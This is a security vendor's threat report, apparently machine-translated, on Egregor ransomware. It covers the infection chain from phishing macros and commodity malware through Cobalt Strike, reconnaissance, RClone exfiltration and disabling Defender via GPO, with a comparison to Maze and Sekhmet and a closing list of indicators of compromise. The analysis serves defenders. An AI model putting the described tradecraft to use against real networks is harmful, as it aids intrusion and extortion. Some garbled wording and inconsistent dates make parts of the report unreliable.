Egregor is a variant of ransomware that was first discovered in September 2020 . Recently, several subtle attacks have been identified that target companies around the world, such as gaming giants Crytek and Ubisoft .
Similar to blackmail-type Maze ransomware, Egregor attacks steal target data, store it on a remote server, and then encrypt the data on the user’s machine. Egregor is probably the most aggressive type of ransomware family in terms of negotiations with victims.
The attacker gives only 72 hours to respond to the victim. If the ransom is not paid, the data will be published on the attacker’s website, Egregor News.
Ransom payments are negotiated and agreed through a dedicated chat feature provided for each victim. Ransom payments are made in Bitcoin.
Egregor is believed to be a companion to another ransomware called Sekhmet, which appeared in March 2020. Sekhmet has many similarities with Egregor, and some with Maze.
Egregor is still quite a mystery in terms of how the attacks are delivered and behind the scenes, and no detailed information is available at this time, but speculation is that Maze announced its suspension in late October. It is also said to be the “successor”. This assumption is based on the closeness between the two and, of course, the timing of the shift.
Main survey results
· New Threat : Egregor ransomware has caused great damage in a short period of time and has smashed news headlines around the world.
· High Severity : Cybereason’s Nocturnus team rates Egregor’s threat level as “high” because of the destructive power of its attacks.
· Slow infiltration: Before deploying ransomware, attackers infiltrate the organization and move it laterally before attempting a full-fledged hacking operation.
· Transmission route through commodity malware : Commodity malware seems to be the source of infection. Based on preliminary reconnaissance of the stolen data sent to the C2 server, it escalate the attack into an interactive hacking operation, eventually causing a large number of ransomware infections.
· Detection and Defense : The Cybereason Defense Platform fully detects and defends against Egregor ransomware.
EGREGOR attack flow
From Commodity Malware Infection to Ransomware
Since Egregor is a relatively recent malware, this report does not provide much of an Egregor-related incident, including information about the infection chain, and does not provide a detailed explanation.
The information obtained so far suggests that the first infection begins with a phishing email with a file with malicious macro code embedded in it.
The macro code downloads either the Qbot iced ID or Ursnif commodity malware. This technique of using commodity malware for initial infection and ultimately delivering ransomware has been previously observed in Ryuk ransomware and Maze.
Later in the attack, when the Cobalt Strike beacon is installed on the infected machine, the attack transitions to an interactive hacking activity. Attackers use reconnaissance tools such as Adfind and Sharphound to gather information about users, groups, computers, and more. This information is also used during the horizontal deployment stage to allow Egregor to exploit Active Directory to elevate privileges in order to become a domain administrator.
At this stage, when the malware is installed on the victim’s machine, it begins communicating with the C2 server, eventually including scripts, DLLs, and other files used to leak data and encrypt files. Additional components will be downloaded.
The files to be imported include the following.
· Batch file : Used to run Bitsadmin and Rundll to download and run the Egregor payload.
· Zip file : Contains a binary file called RClone client (renamed svchost) and RClone configuration files (webdav, ftp, dropbox) that will be used later for data extraction.
CobaltStrike creates a service that executes encrypted PowerShell commands and executes shellcode that creates a connection to amazjai-technologies [.] Industry.
After ingesting the files needed for the attack, the attacker “prepares” and takes the final steps to evade detection and defense by security features.
Create a Group Policy Object (GPO) to disable Windows Defender and try to disable any antivirus product.
As mentioned earlier, an Egregor attacker deploys a ransomware payload after collecting sensitive information and configures a GPO to evade detection and protection by security features. To deploy the ransomware, as mentioned above, run the ingested batch file and use it to download and run the ransomware payload from a remote server.
The Egregor payload can only be decrypted if the correct key is provided in the command line arguments to the Rundll32 process. Therefore, the file cannot be analyzed either manually or using a sandbox unless the exact same command line that the attacker used to run the ransomware is provided.
In order to execute the ransomware and decrypt the blobs of the code in it, the attacker provides the batch file with a “-passegregor 10” key that resolves by executing the ransomware and encrypting the file.
The encrypted file name will have a random string added as a new extension. For example, the file name “My_files.zip” will be changed to “My_files.zip.IAsnM” and “My_files2.zip” will be changed to “My_files2.zip.WZlF”. The attacker also creates “recover-files.txt” with ransom notes in all the folders that store the encrypted files, as shown below.
What SEKHMET and MAZE have in common
Egregor is similar in code to the infamous Maze and Sekhmet ransomware. In addition to code similarities, tree-type ransomware has a lot in common in terms of behavior and features.
|First discovery||May 2019||March 2020||July 2020|
|Encrypted file extension||An extension consisting of random characters is randomly added to the file name.||An extension consisting of random characters is randomly added to the file name.||An extension consisting of random characters is randomly added to the file name.|
|Cryptographic algorithm||ChaCha and RSA||ChaCha and RSA||ChaCha and RSA|
|File name of the ransom request message||DECRYPT-FILES.txt||RECOVER-FILES.txt||RECOVER-FILES.txt|
|Be killed||Encryption and blackmail||Encryption and blackmail||Encryption and blackmail|
|Cybercrime contact||Tor browser website||Tor browser website||Tor browser website|
|Website||Maze News||Leaks, Leaks, Leaks||Egregor News|
Another way to look for commonalities between the three malwares is to look at the infrastructure. There are various binaries, Zip files, and scripts with IP address 185.238.0 [.] 233.
· Maze ransomware binaries
· Egregor ransomware binaries
· Zip file contains RClone binaries and configuration file
The IP address is referenced by various scripts, such as a batch file that downloads the Egregor payload.
Also noteworthy are the similarities between the three ransom notes. They have a very similar structure, with some being “copy-pasted”.
Not only the Maze and Egregor binaries were found on this particular server. Other samples related to Prolock ransomware have also been found on the server, as analyzed in this report .
188.8.131.52 184.108.40.206 220.127.116.11 765327e1dc0888c69c92203d90037c5154db9787f54d3fc8f1097830be8c76ab 4139c96d16875d1c3d12c27086775437b26d3c0ebdcdc258fb012d23b9ef8345 af538ab1b8bdfbf5b7f1548d72c0d042eb14d0011d796cab266f0671720abb4d 6675c204844476dd8ce59ead0eac082754ded599036551526a8e2c509a1407e4 004a2dc3ec7b98fa7fe6ae9c23a8b051ec30bcfcd2bc387c440c07ff5180fe9a 42ac07c5175d88d6528cfe3dceacd01834323f10c4af98b1a190d5af7a7bb1cb 7caed5f406445c788543f55af6d98a8bc4f0c104e6a51e2564dd37b6a485cc18 c1c4e677b36a2ee6ae858546e727e73cc38c95c9024c724f939178b3c03de906 2d563dd113a02fdf452544ae2fd7c94162be6db8fb7a287a3474a6ab998159fd a5989c480ec6506247325652a1f3cb415934675de3877270ae0f65edd9b14d13 6a441734b34cdee31a01164140b0c88966fbb4358dcb63a14ae6824f09e9476f 14e547bebaa738b8605ba4182c4379317d121e268f846c0ed3da171375e65fe4 f0adfd3f89c9268953f93bfdfefb84432532a1e30542fee7bddda14dcb69a76c 444a6897058fd4965770167b15a2ab13e6fd559a3e6f6cf5565d4d3282587459 1c2b3fff557791d255987234249a453237aa2522634828ab503c87c383e49d86 830d274a1cbeebe34b0997d5c84c6028a0c72e74762f770f2240d12c1c4ba3a5 21960f49f296623f1ca6bc15ca8117f57774db97fd910855f75f15364879cfda 885f0566e978ab36cd3f33995fb16ec3e31535b2de4c651a1bc7a3172ae7dc60 0a599e58fb4949fe21c182523178bc479f22ffd57cd582417bf62172a0be348a f7bf7cea89c6205d78fa42d735d81c1e5c183041 5a346fb957abeba389424dc57636edcacc58b5ba 901cee60fba225baf80c976b10dfa1684a73f5ee a6259615ea10c30421e83d20f4a4b5f2c41b45b8 03cdec4a0a63a016d0767650cdaf1d4d24669795 4ea064f715c2a5f4ed68f57029befd8f406671dd ac634854448eb8fcd3abf49c8f37cd21f4282dde 7bc6c2d714e88659b26b6b8ed6681b1f91eef6af 0579da0b8bfdfce7ca4a45baf9df7ec23989e28b 3a33de9a84bbc76161895178e3d13bcd28f7d8fe 986f69a43e0bf174f73139785ec8f969acf5aa55 f1603f1ddf52391b16ee9e73e68f5dd405ab06b0 ac6d919b313bbb18624d26745121fca3e4ae0fd3 95aea6b24ed28c6ad13ec8d7a6f62652b039765e a786f383dfb90191aa2ca86ade68ee3e7c088f82 1be22505a25f14fff1e116fafcaae9452be325b1 a2d5700def24c3ae4d41c679e83d93513259ae4a 34a466a0e55a930d8d7ecd1d6e6c9c750082a5fe 2edaa3dd846b7b73f18fa638f3e1bc3a956affa4 0de24cec66ef9d1042be7cf12b87cfc4 7087c55287578a3660cd86435241e59a b196bc4d3bea5b7922b98d9ba9eb8e2b d16a62fa072bbbf84aee0be82e6850a3 5f9fcbdf7ad86583eb2bbcaa5741d88a 1a65aae1076d8026bde8e576adcdadd2 b554791b5b161c34b0a7d26e34a88e60 1cce0c0d67fe7f51f335a12138698403 3c18331989cb006506338ed1f838430d 520ee511034717f5499fb66f9c0b76a5 685a38092179c2e5602c06faba7287e6 d1aa0f26f557addd45e0d9fa4afecf15 7375083934dd17f0532da3bd6770ab25 8ba3a9d73903bd252f8d99a682d60858 32fe2886f2c9302b3fb12a964a07c7ec 2a7fd15ebe1a1ac21e5f2aa889f26e46 bcdb9b0346f803c6a2c7d13db9105c24 4935bb1e2208b6df924e39797ab69bf8 edaa31c37af0b72f7c1d747969f3facf